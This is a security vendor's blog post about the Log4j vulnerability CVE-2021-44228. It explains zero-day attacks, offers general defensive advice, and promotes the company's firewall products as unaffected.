A fresh zero-day attack with the ability to jeopardize the everyday operation of companies globally is in the news this week. Security researchers recently disclosed the vulnerability CVE-2021-44228 in Apache’s log4j, which is a common Java-based library used for logging purposes. The vulnerability only requires an attacker to send a specially crafted string to the logging functions. Specifically, the vulnerability is in the Java Naming and Directory Interface (JNDI) support of LDAP.
This exploit was first publicized when Minecraft players were warned hackers could execute malicious code on servers or clients running the Java version of the game. Patching quickly remedies things for the game’s users, but many other systems also rely on this same logging system.
Amazon Web Services, Microsoft, Cisco, Google Cloud and IBM were among major tech players affected by the Log4j vulnerability. Wired reported the exploit, “will continue to wreak havoc across the internet for years to come.” In a statement, US Cybersecurity and Infrastructure Security Agency (CISA) director Jen Easterly described the flaw as “one of the most serious I’ve seen in my entire career, if not the most serious.”
What is a Zero-day Exploit?
Bad actors are determined to get in to systems and networks. They probe persistently until they find a previously unknown and unpatched flaw to access your system. Once they find a vulnerability, they hurry to write and install an attack before the developer discovers it.
This type of attack hurts business as it causes complications before you know it is there. That is why it is called a zero-day attack. Regrettably, it can take weeks, even months, to discover the attack.
What to do about Zero-day Attacks
CISA has an in-depth article that explains the origin of this exploit and guidance of what to do if you believe you have a system that may be affected.
In the meantime, you should always keep software up to date with security updates and patch to limit exposure to this and other types of cyberattack.
It is also best to limit the number of software applications you download. The more you use, the greater your risk of exposure.
You will also want to install a firewall to help maximize your system protection. Firewalls feature various automated tools that use whitelisting to check which apps should accept and reject internet access. Installing antivirus tools also works to block threats and keep your devices secure. Where most of these actions are automated, users should make judicious use of outbound filtering to limit what external resources their devices can reach. This is where Calyptix’s Community Shield really shines by utilizing the fleet of AccessEnforcer firewalls to identify and block outbound events that could compromise your network.
Here are some things that MSPs and IT managers can do to respond to this vulnerability:
Calyptix Protection Against Log4j
Calyptix’s developers reviewed this vulnerability and have concluded that no systems within the AccessEnforcer line are affected. Adjacent systems such as Geo Fence, Gatekeeper, Community Shield and our backend systems are also unaffected.
To further ensure protection, we rolled out a blocklist of publicly -known Log4j scanners and exploits on Friday, December 10th. Since then, our developers have continued working hard to build a threat feed specifically for this exploit as it pertains to outbound events.
|Geo Fence||Not Affected|
|Community Shield||Not Affected|
|Web Filters||Not Affected|
|Web Server||Not Affected|
Calyptix’s AccessEnforcer is an all-in-one solution for network security and management. Our mission is to automatically block threats like hackers, spam, and malware. Our network tools keep small business connections fast and reliable. With Community Shield™ we have added a community-driven, proactive feature to further defend users.
Check out our Community Shield™ Log4j Dashboards.